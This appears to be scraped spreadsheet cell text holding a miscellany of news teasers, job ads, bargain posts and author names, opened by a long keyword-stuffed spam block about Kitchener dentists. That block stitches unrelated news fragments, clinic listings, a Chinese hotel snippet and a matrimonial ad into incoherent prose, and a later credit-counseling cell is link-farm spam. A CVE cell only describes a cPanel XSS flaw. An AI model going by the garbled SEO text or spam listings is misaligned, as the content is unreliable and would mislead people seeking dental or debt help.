Ontario’s number was 5.1 per cent. In terms of job creation, the. Dentist Phone number: +1 519-742-8303 Province: Ontario City: Kitchener Address: 1058 Queen's Blvd, Kitchener, ON N2M 1C2, Canada, Kitchener, Ontario, N2M 1C2. Region home to 4th busiest food bank in Ontario – She says that number has risen. executive director of Feed Ontario. The lowest income in the region is in the Kitchener. Friendliest Dentist In Kitchener Ontario The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. Our 50-Point Inspection includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently accepting new patients. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the more complex needs of seniors, you can trust us to keep you smiling! Français in Please provide a postal code or a city, or select a city from the directory. Kitchener, ON Find. Number 1 Dentist In Kitchener Ontario Very kind, patient and. Johal says it’s a pretty similar to trend to what’s happening in Ontario. In the region. As well, people aren’t using. KITCHENER, Ont. — Kik Interactive Inc. said Wednesday it. Investors based in Canada, however, were barred from buying Kin. No Widgets found in the Sidebar Alt! Dentist. Friendliest Dentist Near Kitchener Ontario Kids Dentist Kitchener, Ontario A pediatric dentist can offer comprehensive oral care specifically suited to the needs of your child. Just as you would take your child to a pediatrician to receive medical care, pediatric dentists undergo additional education and training to offer the highest standard of dental. Visit RateMDs for Dr. Gregory Fichter reviews, contact info, practice history, affiliated hospitals &amp; more. Name Toggle navigation Menu Find A Doctor Find A Facility Health News Health Forum Doctors Ontario Waterloo Dentists Dr. Gregory Fichter You may also. Visit RateMDs for Dr. Ali Kapasi reviews, contact info, practice history, affiliated hospitals &amp; more. Name Toggle navigation Menu Find A Doctor Find A Facility Health News Health Forum Doctors Ontario Waterloo Dentists Dr. Ali Kapasi You may also like . 22. ‘Respect the lavender’: Ont. farm tells selfie-seekers to stop crushing its plants – It’s a trend that is increasing, from rural farms in Ontario to the stunning tulip fields of The. the lavender and. Plant-based eggs join meatless options at Tim Hortons – So she was pleased to discover this week that her local Tim Hortons now offers its meatless breakfast sandwich with a. She lives on Margaret Avenue in Kitchener. To get to her dentist on the other side of the city. But now there is no seat, Most Popular Dental Clinic In Kitchener Looking for dentist or dental care clinic in Kitchener, ON? Contact Kaur, P DDS (P Kaur DDS) located in 1190 King St E, Kitchener, ON, N2G 2N4, at 519-578-7160 to get working hours, San Francisco Dental Implants , a recognized clinic for excellent care and successful. making its team among the most experienced in the Bay Area. Dr. Rabinovich is a Board Certified Oral. At a groundbreaking ceremony last July, officials said the new site will provide the in-house services currently offered at. There are various aspects of procedures in the dental clinic but the two most common are teeth whitening. In the dental. Preferred Dental Clinic Near Kitchener Top Dentist In Kitchener D’Amato: In an Ion-centric world, let’s not forget the ordinary bus passenger – She lives on Margaret Avenue in Kitchener. To get to her dentist on the other side of the city. for an ambitious increase. Joel Rubinoff: My sons’ pulse-pounding literary aspirations have me reaching for night light – I look around the room worried someone will call 911 but, to my relief, people seem genuinely impressed by Max’s over-the-top. Falls public health site to open this fall – In an interview this week, project manager Gord Low said the summer opening was a "best guess estimate" at. services. Dentists In Kitchener The top rated &amp; reviewed dentists in Kitchener, ON. See below for which dentists are accepting new patients, their profile, credentials and clinic locations. Most Popular Dentist In Kitchener Most Popular Dentist In Kitchener Ontario Cosmetic Dental Clinic In Kitchener Ontario Welcome to Dr. Matthew Vasiga's family and cosmetic dental clinic in Williamsburg Town Centre, Ontario. McSweeny Kevin P Dr Ontario, 966 King St W Kitchener N2G 1G4 Kitchener (519) 579-3300 Closed Opening Hours Check out our website 43.454820 , Forest Hill Family Dental is a dental clinic based in Kitchener/Waterloo. We provide general and cosmetic dentistry services and promise to provide honest, individualized treatment. Our team consists of dedicated individuals who are kind, friendly, and caring. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. Highland Dental Office, Ottawa South Dental Office and Infinite Dental office. Dentist in Kitchener,Waterloo and Cambridge, Ontario area. Dental Specialties in Kitchener &amp; Waterloo, Ontario – We offer dental services such as emergency dentistry, general dentistry, cosmetic dentistry, pediatric dentistry, periodontal dentistry and sedation dentistry. 95% of our patients say they'd recommend us to friends. Get started today! Reserve an appointment online now. Dentist, cosmetic dentist, dental clinic, emergency. Dr. Hurlbut, Dr. De Miglio and their Kitchener dental team know and understand the importance. Rise of STIs in Waterloo region aligns with rise across Canada – Johal says it’s a pretty similar to trend to what’s happening in Ontario. In the region. As well, people aren’t using. Ontario’s minimum wage is frozen at $14. Could Ottawa set its own? – In addition to a federal minimum wage, the seven-person panel — which included Mary Gellatly of Parkdale Community Legal. . Number 1 Dental Clinic Near Kitchener Ontario City Smiles Dentistry is the best and affordable dental clinic for whole family in Fergus which is located near City Hall Kitchener. Feel Free to call at 519-576-9090. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, from children to grandparents. Kid Friendly Dental Clinic In Kitchener It is an excellent location and is going to bring a family-friendly atmosphere to Hobart and surrounding. For more. List of the best Family Dentistry in Kitchener, ON. Get customer reviews ☆, prices, contact details , opening hours from Kitchener, ON based businesses with Family Dentistry keyword. Get customer reviews ☆, prices, contact details , opening hours from Kitchener, ON based businesses with Family Dentistry keyword. Kitchener Dental Clinic . As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric dental specialists are professionals with years of experience in working with the range of children’s needs and with children of all ages. Our dentists are patient and caring – and are known for creating a fun dental experience with every single visit. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. But what should have been a family-friendly celebration of the jacaranda tree in full. According to Ken, who followed in. Best Dental Clinic In Kitchener Ontario In an interview this week, project manager Gord Low said the summer opening was a "best guess estimate" at. services. 1450 Block Line Road #101, Kitchener, Ontario Cosmetic dentistry services from Kitchener East Family Dental in Kitchener, ON can make your smile brighter! Call today to learn more. As a leading dentist near Kitchener, our team is skilled in evaluating smiles and recommending treatments that can help. At a groundbreaking ceremony last July, officials said the new site will provide the in-house services currently offered at. With gradual transformation in the trend of oral treatment from traditional techniques to innovative and technologically. List of the best Cosmetic Dentistry in Kitchener, ON. Get customer reviews , prices, contact details , opening hours from Kitchener, ON based businesses with Cosmetic Dentistry keyword. Sign up for Facebook today to discover local businesses near you. Sign Up City Smiles Dentistry Cosmetic Dentist Unofficial Page · Located in Kitchener, Ontario Photo contributed by Noelle English Reviews Rachel Bolton reviewed City Smiles Dentistry — ·. Cosmetic Dentist Near Kitchener . dental work with the use of sedation while you can improve the overall look with cosmetic dental procedures. The cost of. APP點子有最夯royal park hotel the fukuoka介紹以及hotel forza hakata 76筆2頁,the royals在線討論,Book. Preferred Dental Clinic Near Kitchener You can consult the locals or those who have had the chance of visiting your preferred destination. Visiting a wonderful dental clinic before your trip will help improve your smile to look more. Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. At a groundbreaking ceremony last July, officials said the new site will provide the in-house services currently offered at. Brides Wanted – job or abroad preferred. Two sisters married &amp; in USA &amp; Italy. Amritsar 5′-11" doing Post Graduation in Orthodontics IInd year having own clinic only son of well settled Radha soami family parent. This incredible Art Deco building in the center of the park was first built in the 1930s as a philanthropic dental clinic for. Most Popular Dental Clinic In Kitchener Ontario Patients of all ages are welcome at this dental clinic located at Kitchener in Ontario and the main objective of the team is to care for their smiles. The dentists and their team are highly trained and have wide experience in enhancing the dental and oral health of. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dent...</t>
  </si>
  <si>
    <t>Footage of rodents running along the top of fridges, down walls and across aisles of FamilyMart shop in Tokyo viewed 5m timesA major convenience store operator in Japan has closed one of its shops and issued an apology after video clips of several rats scurrying across its floor and dropping from its shelves were widely shared online.FamilyMart, which has 14,000 stores nationwide, said it had closed the store in the busy Tokyo district of Shibuya after users posted clips of at least half a dozen rats inside the shop. Continue reading… Read More</t>
  </si>
  <si>
    <t>MENTORING is the key to success – that’s what the majority of small business owners believe a new study from Aldermore has found. Daily Express :: Finance Feed Mentors offer budding entrepreneurs best hope of success, Aldermore study finds</t>
  </si>
  <si>
    <t>Office rental company filed for initial public offering, publishing statements showing loss of almost $700m in the first half of 2019WeWork, a company that has shaken up the sleepy world of office rentals by adding a hipster aesthetic and beer taps to office life, became the latest Silicon Valley “unicorn” to file for an initial public offering (IPO) on Wednesday, revealing huge losses and rapid growth.The nine-year-old company now runs offices in 111 cities worldwide with 527,000 members paying fees for access to a shared workspace in 29 countries across the world. Continue reading… Read More</t>
  </si>
  <si>
    <t>FLIGHTS see a number of cabin crew working together on board an aircraft while pilots fly the plane. If they’re travelling long-haul they crew may spend several nights together -so what really happens between them while they’re away? Daily Express :: Travel Feed</t>
  </si>
  <si>
    <t>EXELLAR TRANSPORTATION INC. BRAMPTON, ON *** WE SPEAK ENGLISH, PUNJABI, HINDI, MARATHI, URDU, TAMIL *** WE ARE HIRING FULL-TIME OWNER-OPERATOR FOR ONTARIO ONLY WORK. HOME EVERY DAY !!! DESCRIPTION : • DAY SHIFTS (EARLY START MAKE YOU MORE MONEY). • YARD – YARD RUNS. • ONLY DRY VAN LOADS. • PAID WAITING TIME. • BI-WEEKLY .. Read more</t>
  </si>
  <si>
    <t>On a Saturday night, I’d rather stay in and watch a movie, read a book or do a crossword.</t>
  </si>
  <si>
    <t>Jackie Smithfield</t>
  </si>
  <si>
    <t>Ahead of the new season, the Newcastle United Supporters Trust (NUST) have carried out a massive survey of members. With so many issues concerning Newcastle fans, the Trust has seen...Ahead of the new season, the Newcastle United Supporters Trust (NUST) have carried out a massive survey of members. With so many issues concerning Newcastle fans, the Trust has seen... You can click here to read the full article. The post Massive survey of Newcastle United Supporters Trust members shows only 7% against Arsenal Boycott appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>For NFL Players, Career Length, Role Affect Future Health Risks: Study Original Source FRIDAY, Aug. 30, 2019 (HealthDay News) — Pro football players who had long careers at key positions are more likely to have concussion-related problems such as confusion, memory loss, depression and anxiety, a new study finds. In a survey of nearly 3,500 former NFL players (average age 53), 1 in 8 (12%) reported serious cognitive problems. That compares to about 2% of the general U.S. population. Age didn’t appear to be a factor. Former players younger than 52 had a rate (13%) of problems similar to that of other ex-players. Even those 45 and younger had an increased risk. In fact, 30% of those 45 and younger who suffered the most serious concussions had severe problems with thinking and mental health, the study found. Those who played 10 or more seasons were twice as likely to have severe problems than those who played just one season (12.6% versus 5.8%). The risk rose with each season played, and every five seasons of play was associated with a nearly 20% increase in risk. Kickers, punters and quarterbacks had the fewest concussion symptoms per season, followed by wide receivers, defensive backs, linemen and tight ends. Running backs, linebackers and special teams players had the most. The risk of serious problems was twice as high among former players with the most concussion symptoms (15%) than in those with the fewest (6%). Those with the most concussions also had sharply higher rates of depression and anxiety (25% and 27%, respectively) than those with the fewest concussions (15% and 16%). Compared to former players with the fewest concussion symptoms, those with a mid-range number of symptoms had a 75% higher risk of cognitive problems and a 40% higher risk of depression and anxiety. About 1 in 4 former players reported anxiety (26%) or depression (24%), and nearly 1 in 5 (18%) reported both. Career length was also associated with depression risk, with a 9% increase for every five seasons played. The number of seasons played was not linked with increased risk of anxiety. Unlike previous studies, the Harvard University researchers did not find a link between starting football at a young age and problems with thinking and memory in adulthood. The study — published Aug. 30 in The American Journal of Sports Medicine — was supported by the National Football League Players Association. It is part of Harvard’s ongoing Football Players Health Study. “Our findings confirm what some have suspected — a consistently and persistently elevated risk for men who play longer and who play in certain positions,” said lead investigator Andrea Roberts, a research scientist at the Harvard T.H. Chan School of Public Health. “Our results underscore the importance of preventing concussions, vigilant monitoring of those who suffer them and finding new ways to mitigate the damage from head injury,” she added in a university news release. Ross Zafonte, head of the Department of Physical Medicine and Rehabilitation at Harvard Medical School, is principal investigator on the Football Players Health Study. “Clearly, not everyone who sustains a concussion is destined for cognitive trouble,” he said in the news release, “But the results of the research highlight just how critical it is to continue to find ways to prevent head injuries from occurring in the first place because of the many downstream and long-lasting effects on physical, cognitive and mental health.” More information The American Academy of Family Physicians has more on concussion. SOURCE: Harvard University, news release, Aug. 30, 2019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For NFL Players, Career Length, Role Affect Future Health Risks: Study appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Persian English Dictionary – travel dictionary to translate Persian to English. Click on the list to show Persian or English synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Persian English Dictionary →</t>
  </si>
  <si>
    <t>Ernie Manning</t>
  </si>
  <si>
    <t>Darwin Cup winning jockey Peter Hall has been booked on topweight Touch Of Silver for his return to Perth race riding in Saturday’s $100,000 Peninsula Mile (1650m) at Belmont Park.</t>
  </si>
  <si>
    <t>A special report warns a Chinese economic slump could induce an Australian recession and give the country a 9.3 per cent jobless rate.</t>
  </si>
  <si>
    <t>Sarah Steger</t>
  </si>
  <si>
    <t>Mandurah Detectives are investigating a series of home burglaries in the Dudley Park area over the past 10 days.</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</si>
  <si>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Louisville, Kentucky Consumer Credit Counseling Service | (888) 551-1270 by USA Consumer Credit Counseling, Felipe Escobar on Saturday 31 August 2019 12:40 PM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Louisville, Kentucky Consumer Credit Counseling Service | (888) 551-1270 Saturday 31 August 2019 11:46 AM UTC-05 | Tags: kentucky-consumer-credit-counseling-service-888-551-1270 louisville https://youtu.be/gaE2VTMfXHA Louisville, Kentucky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Louisville, Kentucky credit counseling services provide resources to help solve your money problems. Counselors discuss your entire financial situation and help you develop a personalized plan. They can assist you with starting a budget. And they can help you find educational programs on money management. Debt Collection A debt collector generally is a person or company that regularly collects debts owed to others, usually when those debts are past-due. This includes collection agencies, lawyers who collect debts as part of their business, and companies that buy delinquent debts and then try to collect them. The Fair Debt Collection Practices Act (FDCPA) prohibits debt collectors from using abusive, unfair, or deceptive practices to collect from you. The Servicemembers Civil Relief Act (SCRA) assists active-duty military with financial burdens. Under this act, you may qualify for a reduced interest rate on mortgages and credit card debts. It can offer protection from eviction. It can also delay civil court including bankruptcy, foreclosure, or divorce proceedings. To find out if you qualify, contact Louisville, Kentucky Consumer Credit Counseling Service (888) 551-1270. While there is no universal program to help with personal debt, there are a number of local programs to help people in financial hardships. One of the main sources of financial hardship is due to illness and medical bills. Not only do people lose income, but medical debt can be very expensive. Left with no recourse, many people use up their savings and even run up credit card debt to pay medical bills and get medical care. Contact Louisville, Kentucky Consumer Credit Counseling Service at (888) 551-1270 to learn about the many government sponsored programs available to help you get out of debt. http://www.tunesbaby.com/yt/?x=gaE2VTMfXHA http://youtuberepeater.com/watch?v=gaE2VTMfXHA https://consumercreditcounselingserviceusa.blogspot.com/p/lafayette-indiana-consumer-credit_22.html http://creditcounselingconsumer.home.blog/lafayette-louisiana-consumer-credit-counseling-service-888-551-1270-2/ http://californiacreditcounseling.video.blog/montgomery-alabama-consumer-credit-counseling-service-888-551-1270/ http://districtofcolumbiacreditcounseling.home.blog/killeen-texas-consumer-credit-counseling-service-888-551-1270/ via Louisville, Kentucky Consumer Credit Counseling Service | (888) 551-1270 August 31, 2019 at 11:38AM Copyright © August 31, 2019 at 11:38AM Tags: kentucky-consumer-credit-counseling-service-888-551-1270 louisville</t>
  </si>
  <si>
    <t>Ben Schneiders</t>
  </si>
  <si>
    <t>Prominent Victorian union leader Luke Hilakari offered full-throated support to the controversial unionist as women depart the construction union.</t>
  </si>
  <si>
    <t>ozbpro10</t>
  </si>
  <si>
    <t>Since my recent post on the SanDisk High Endurance card was out of stock so quickly, I decided to post this one as a separate deal for those who are looking for an Endurance memory card to use with a dash cam. This card needs no introduction. It is universally recommended for usage in a dash cam. Not the cheapest price of all time, but I believe it is the cheapest at the moment. Original Coupon Deal Also, Viofo dash cam related accessory to save you time for looking around: $17.10 Viofo Dash Cam Hardwire Kit HK3 For Parking Mode</t>
  </si>
  <si>
    <t>A volcano on the Italian island of Stromboli erupted on Wednesday, August 28, spewing gas and ash and causing widespread fires, local media reported. Firefighters were responding to the blazes, and at the time of writing, no injuries were reported from Wednesday’s eruption, local media said. This video shows a column of gas and ash rising from the volcano. The plume from the eruption extended more than one mile high, Italy’s National Institute of Geophysics and Volcanology (INGV) said. The INGV said the seismic activity of Wednesday’s eruption was “comparable” to the July 3 eruption that killed a hiker. Credit: Carlo Poggio via Storyful</t>
  </si>
  <si>
    <t>As gunfire crackled outside and "crazy dog" militia stalked the streets, a baby was born on cardboard in a packed hideout on newly independent soil.</t>
  </si>
  <si>
    <t>A Minnesota prosecutor charged singer R. Kelly on Monday with prostitution and solicitation related to an allegation that he invited a 17-year-old girl to his hotel room in 2001 and paid her $200 to dance naked with him.</t>
  </si>
  <si>
    <t>Source: https://www.computerweekly.com/news/252467930/Most-UK-firms-lack-confidence-in-disaster-recovery Most UK firms lack confidence in disaster recovery Source: https://www.computerweekly.com/news/252467930/Most-UK-firms-lack-confidence-in-disaster-recovery The post Most UK firms lack confidence in disaster recovery appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>WHEN the NT News put out a call for the Territory’s cutest bub we were not prepared for the overwhelming response.</t>
  </si>
  <si>
    <t>Valentine Holmes is set to turn his back on a $1 million NRL contract to continue his dream of making it in the NFL.</t>
  </si>
  <si>
    <t>Anthony Defeo</t>
  </si>
  <si>
    <t>Charles LeClaire-USA TODAY Sports I live in Pittsburgh, but I don’t get to Steelers training camp nearly as much as a die-hard fan should. Is that wrong? The Steelers will break camp Thursday out at Saint Vincent College in Latrobe, Pa.—a place where they’ve prepared for every regular season since the 1960s—and for the 43rd time since 1972, I will have missed every single practice session. I could have attended any practice I wanted to this summer. Take Tuesday, for example. I received a text message from my uncle on Monday morning asking me if I wanted to take his son (my cousin) to a meet and greet session with Tunch Ilkin and Craig Wolfley followed by VIP access to that day’s practice session. I thought about it long and hard, but after deciding that earning money (something no non-Steeler who attends training camp besides Ed Bouchette, Christopher Carter and a few others can actually do) was more important for my immediate survival, I texted back a disappointed “no.” Don’t get me wrong, I wasn’t THAT disappointed. After all, how much better could a VIP view of Steelers training camp be than, say, the vantage-point from the hillside I sat on last summer? Probably much better, right? Oh well, there will be other VIP offers, and if there aren’t, I can just make a day of it at the team’s annual Family Fest Heinz Field practice they conduct on a select Sunday in early August. The Steelers held such a practice on August 4, 2019. I know, I was there—or should I say, I was on the North Shore, getting my Sunday steps in as I passed many fans clad in black and gold gear. I could have very easily checked into Heinz Field, paid $10 for a ticket and observed a few hours of practice. Nah, I had to get home and get ready for my bowling match that evening. To reiterate, there will be another Family Fest practice next season that I can attend…provided it doesn’t interfere with my bowling night. As a life-long Pittsburgher, am I taking training camp for granted? Saint Vincent College isn’t exactly a hop, skip and a jump from where I live (it’s 36 miles, according to my GPS), but it’s certainly close enough to attend at least one practice every summer. There are fans that drive and fly from far and wide to attend a Steelers training camp. I know because I’ve talked to folks from Minnesota, California and even Europe during previous visits to Latrobe. People save money to book flights and hotel rooms just to attend one training camp session. Some would rather spend a week’s vacation sitting on the grass of Saint Vincent than on the sand of some beach. Me, all I need is a half a tank of gas and some money for tolls, and yet, my general reaction to the idea of going is “meh.” At this point, I need a girlfriend to get me to camp (that’s the only reason I finally started attending them in the late-00s) or a kid (mine or someone else’s—I took my niece last year). I offered to drive a couple of friends to camp this summer and pay the tolls, but not because I really wanted to go. This was just to show my gratitude for friend things they’ve done for me recently (yeah, because that equals a free ticket to a Pitt basketball game—I’m such a cheapskate). Am I a bad Steelers fan for only going to camp every other season or so since 2009? For that matter, am I a bad Steelers fan for not going at all until 2009? Should I forever be banished from Saint Vincent College? If your answer to all of the above is “yes,” am I a bad Steelers fan for not being too upset about it?</t>
  </si>
  <si>
    <t>Season 5 of Mom returns to Nine this week, screening at 10:40pm this Wednesday. “Spaghetti Sauce and a Dumpster Fire” is S5E18 which aired in the US in April 2018.</t>
  </si>
  <si>
    <t>Oriental Music and Dance is looking for qualified, professional and passionate Dance Instructors to join the team for September 2019- 2020 school year! Our objective as dance educators is to share a love of dance and performing with our students. Classes emphasize dance technique, style and personal growth. This is a great opportunity for working .. Read more</t>
  </si>
  <si>
    <t>Here is a team news update from Ole Gunnar Solskjaer ahead of Man Utd's trip to Wolves on Monday including an update on Alexis Sanchez.</t>
  </si>
  <si>
    <t>VeryCheap</t>
  </si>
  <si>
    <t>Refurb units with 3 months warranty Dell P2414H 24 inch LED Monitor 1920x1080 VGA/DVI/DisplayPort 3MthWty (Refurb) Overview Outstanding screen clarity for productive offices Bright, clear Full HD display with the viewing features and connectivity options that help boost productivity in business and at home Flexible viewing features The Dell™ 24" Monitor – P2414H adjusts to fit your work style and provides virtually all the connectivity options you'll need over the course of the day. Monitor stand has full adjustability features to maximize viewing comfort Easily transition from landscape to portrait orientation — gives you the option of viewing large web pages with less scrolling Dell Display Manager is your one-stop software application to manually adjust or auto assign optimal preset modes to specific software applications VESA compatibility If you prefer a different mounting option to fit your particular workspace, you can purchase your P2414H Monitor without a stand. The VESA-compatible mounting plate makes it easy to adopt alternative choices (mounting kits sold separately), including: Dell Single Monitor Arm Dell Dual Monitor Stand Wall-mounting kit Multiple connectivity options A comprehensive range of analog and digital connectivity ports and cables are included: VGA DisplayPort DVI-D (excluding DVI-D cables) USB Impressive screen clarity Every detail is bright and clear Full HD 1920 x 1080 resolution at 60Hz (max.) LED-backlit 250 cd/m2 brightness (typical) 85% color gamut1 (typical) Color clarity and consistency across an ultra-wide viewing angle Original Coupon Deal</t>
  </si>
  <si>
    <t>Voters say they are concerned about levels of insecurity and the recent migrant deal struck with the US. The post Guatemala poll pits ex-first lady against ex-prison chief appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>England quick Jofra Archer has rocked Australia again with a 6-wicket haul to have the home side in control of the third Ashes test on day one at Headingley and the Boomers have gone down by 16 points to Team USA in the first of their World Cup warm up matches. Image: News Corp Australia</t>
  </si>
  <si>
    <t>Japanese Food – WORM FISH HOTPOT Fried Loach Tokyo Seafood Japan The post Japanese Food – WORM FISH HOTPOT Fried Loach Tokyo Seafood Japan appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Police in Portland, Oregon have arrested at least 13 people as a right-wing group marched to a downtown waterfront park and anti-fascist counter protesters scuffled with officers who tried to keep the two sides apart.</t>
  </si>
  <si>
    <t>ozzbargainer</t>
  </si>
  <si>
    <t>Good price for a front load washer compared to $445+ in other stores and cheaper than previous TGG deal. More than 10 available at the time of posting. Delivery available with usual Bing Lee exclusions. Reviews here Original Coupon Deal</t>
  </si>
  <si>
    <t>Steve Smith copped a nasty blow to his arm and was then hit on the neck by a Jofra Archer bouncer before eventually being dismissed for 92 on an eventful day at Lord's.</t>
  </si>
  <si>
    <t>Please reply us with: 1. years of experience 2. past companies worked for 3. Address / email / phone number to contact  We are currently seeking 7 Tri-Axle Dump Truck Driver – DZ Or AZ license in the Toronto area.   Requirements:  • Must have Dump Truck driving experience, minimum of 2 years preferred if you have .. Read more</t>
  </si>
  <si>
    <t>Stocks fell two or more percent Friday before President Donald Trump made good on a threat to escalate the trade war between the U.S. and China by jacking up planned tariffs on Chinese-made goods in retaliation for Beijing's threat of new tariffs. Conway G. Gittens reports.</t>
  </si>
  <si>
    <t>Smokers in England have consumed almost 1.5 billion fewer cigarettes each year since 2011, according to new research. Read more? Click here</t>
  </si>
  <si>
    <t>World No.1 and defending Cincinnati Masters champion Novak Djokovic and Roger Federer both advanced to the third round with straight-set wins.</t>
  </si>
  <si>
    <t>cPanel before 60.0.25 allows self stored XSS in postgres API1 listdbs (SEC-181). Published at: August 06, 2019 at 02:15PM View on NVD website The post New vulnerability on the NVD: CVE-2016-10782 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Man City news: Mario Balotelli to take part in Vincent Kompany’s testimonial Original Source Mario Balotelli confirmed to take part in Vincent Kompany’s Manchester City testimonial match next month The Italian striker will return to the Etihad on September 11 for the clash Manchester City Legends will line up against a Premier League all-star XI Balotelli will feature in the side he had scored 30 goals in 80 appearances for The 29-year-old had recently secured a move to hometown club Brescia in Italy By Daniel Davis For Mailonline Published: 22:50 BST, 20 August 2019 | Updated: 22:50 BST, 20 August 2019 Mario Balotelli has been confirmed to be taking part in Vincent Kompany’s Manchester City testimonial match next month, according to Goal. The unpredictable striker, who had recently signed for Italian side Brescia, will make his return to the Etihad on September 11. Balotelli had scored 30 goals in 80 appearances for the reigning Premier League champions, and will face off against a top flight all-stars XI alongside some of his former teammates. Mario Balotelli is confirmed to be taking part in Vincent Kompany’s testimonial next month The Manchester City Legends side will be managed by boss Pep Guardiola and will feature several ex-players, including Joe Hart, Joleon Lescott, Paulo Zabaleta, Gareth Barry and Craig Bellamy. Current stars Sergio Aguero and David Silva will also line up in the sky blue jersey against the opposition, who will be coached by Belgium manager Roberto Martinez. Although Balotelli had endured a mixed spell in Manchester, he secured his spot in the club’s history books by setting up Aguero for his infamous title-winning strike in 2012. But his lacklustre attitude and high-profile attempt to take City to a Premier League tribunal ultimately saw him depart off the back of a soured relationship. After spells at AC Milan, Liverpool, Nice and Marseille, Balotelli secured an emotional switch to his hometown club Brescia as a free agent. The unpredictable striker had netted 30 goals in 80 appearances at the reigning champions The 29-year-old will help City honour their former skipper, who had spent 11 years at the Etihad But the 29-year-old will take time out of his preparations for the new Serie A campaign to honour City’s long-serving former skipper Kompany. The Belgian stalwart had left the Etihad at the end of last season to take up a player-manager role at Anderlecht, although his first tenure in management has experienced a rocky start. Kompany’s 11-year career at City saw him lift four Premier League trophies, two FA Cups, four League Cups and two Community Shields. Share or comment on this article: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 City news: Mario Balotelli to take part in Vincent Kompany’s testimonial appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Source: https://www.techspot.com/news/81272-burger-king-impossible-whopper-goes-nationwide-starting-next.html Burger King’s Impossible Whopper goes nationwide starting next week Burger King earlier this year started market testing a meat-free version of its famous Whopper in select restaurants in the St. Louis area. Now, the burger chair is preparing to take the Impossible Whopper nationwide. Source: https://www.techspot.com/news/81272-burger-king-impossible-whopper-goes-nationwide-starting-next.html The post Burger King’s Impossible Whopper goes nationwide starting next week appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Have Newcastle fans got any expectations? The media appear to want the debate to be all about the Newcastle fans wanting Steve Bruce sacked, with pundits and journalists rallying to...Have Newcastle fans got any expectations? The media appear to want the debate to be all about the Newcastle fans wanting Steve Bruce sacked, with pundits and journalists rallying to... You can click here to read the full article. The post Mike Ashley ownership of Newcastle United is the disease, Steve Bruce only a very visible symptom appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>MONCTON — Montreal Alouettes running back William Stanback is expected to return to the lineup on Sunday, the team has announced. The Als are set to take on the Toronto Argonauts in the Touchdown Atlantic game in Moncton, as the two clubs close out Week 11 at Stade Croix Bleue Medavie Stadium. Stanback, 25, was one of the CFL’s top rushers before being injured in Week 8. The breakout sophomore has totaled 592 rushing yards and four touchdowns while averaging 6.7 yards per attempt. While Stanback returns, American offensive tackle Tony Washington is out for Sunday’s contest. He’ll be replaced by Chris Schleuger at left tackle, with Spencer Wilson slotting in at right tackle. National Bo Lokombo is expected to start at safety, where all-star Taylor Loffler is believed to have suffered a season-ending torn ACL. RELATED » Depth Charts: MTL | TOR » O’Leary: LeBlanc, Schooners making the most of Touchdown Atlantic » Watch: 1-on-1 with Schooners founding partner Anthony LeBlanc » Buy Tickets: Touchdown Atlantic</t>
  </si>
  <si>
    <t>Hello there! My name is Kelley and I am an educator on holidays seeking casual work as a babysitter. For the past 8 years I have been a teacher, educational consultant and instructor at the university level. I enjoy working with children of all ages and always aim to make time spent together fun and .. Read more</t>
  </si>
  <si>
    <t>Peter Sweeney</t>
  </si>
  <si>
    <t>If you have memories or photographs you wish to share, contact the Pikes.</t>
  </si>
  <si>
    <t>Variety Disney Plus: First Global Markets Get Launch Dates, Pricing Monday 19 August 2019 08:00 AM UTC-05 | Tags: disney disney-plus global news Disney will begin its international roll-out of Disney Plus on the same day – Nov. 12 – that the direct-to-consumer service launches in the U.S., with a push into Canada and the Netherlands, followed a week later by Australia and New Zealand. In addition, Disney's Direct-to-Consumer and International group announced Monday that it had reached […] Tags: disney disney-plus global news</t>
  </si>
  <si>
    <t>Before Israel's decision, Trump tweeted it would be a "show of weakness'' to allow the two representatives in.</t>
  </si>
  <si>
    <t>Ally McKay</t>
  </si>
  <si>
    <t>If Pep Guardiola is to fulfil Manchester City’s destiny and win the Champions League, he will have to one day take full advantage of his club’s continued propensity to be drawn in easy groups. Ukraine’s Shakhtar Donetsk, Croatian champions Dinamo Zagreb and group-stage debutants Atalanta of Italy should represent little in the way of tough opposition. It’s the third year running that City and Shakhtar have been drawn together, with the Premier League champions winning both games last season, 6-0 and 3-0. The Ukrainians caused a shock in 2017, winning 2-1, so Guardiola will take the challenge seriously, but even a fresh shock would seem unlikely to be sufficient to derail City’s progress to the knockout stages. Dinamo made the last 16 of the Europa League last season, but were dumped out by Benfica. Atalanta will use Milan’s imposing San Siro stadium for their games, but it is unlikely even the most hostile atmosphere would faze players of City’s quality and experience. Champions League Group C Manchester City Shakhtar Donetsk Dinamo Zagreb Atalanta When does the group stage begin? The Champions League group stage runs from Tuesday 17 September to Wednesday 11 December. Match dates: Matchday one: 17-18 September Matchday two: 1-2 October Matchday three: 22-23 October Matchday four: 5-6 November Matchday five: 26-27 November Matchday six: 10-11 December More on 